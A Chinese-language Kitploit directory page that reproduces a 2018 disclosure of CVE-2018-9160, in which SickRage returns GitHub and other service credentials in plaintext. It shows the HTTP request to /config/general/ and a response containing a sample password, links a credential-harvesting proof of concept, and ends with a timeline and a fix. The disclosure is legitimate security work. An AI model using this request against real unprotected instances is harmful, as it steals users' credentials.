Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
工具/GitHubGitHub/mechanico/sickragewtf
密码攻击漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

查看仓库
8年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SickRage 明文 GitHub 凭据漏洞 CVE-2018-9160


  1. 关于

漏洞标题:SickRage 在 HTTP 响应中返回明文凭据
日期:2018-04-01
漏洞作者:Sven Fassbender
联系方式:https://twitter.com/mezdanak
厂商主页:https://sickrage.github.io
软件链接:https://github.com/SickRage/SickRage
版本:< v2018.03.09-1
CVE : CVE-2018-9160
分类:webapps


  1. 背景信息

“SickRage 是一个自动化的电视节目视频库管理器。
它会关注你最喜欢节目的新剧集,当它们发布时,它会施展魔法:
按你想要的画质自动搜索、下载和处理 torrent/nzb。” ——摘自 https://sickrage.github.io


  1. 漏洞描述

SickRage 在 HTTP 响应中以明文形式返回例如 GitHub、AniDB、Kodi、Plex 等服务的凭据。
前提是用户未为其 SickRage 安装设置用户名和密码(默认情况下未强制设置)。

HTTP 请求:

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

HTTP 响应:

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. 概念验证

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. 时间线

[2018-03-07] 发现漏洞
[2018-03-08] 联系厂商
[2018-03-08] 厂商回复
[2018-03-09] 漏洞已修复。(https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. 修复建议

将 SickRage 更新到 v2018.03.09-1 或更高版本。
请使用适当的用户凭据保护 Web 应用程序的访问。


下载工具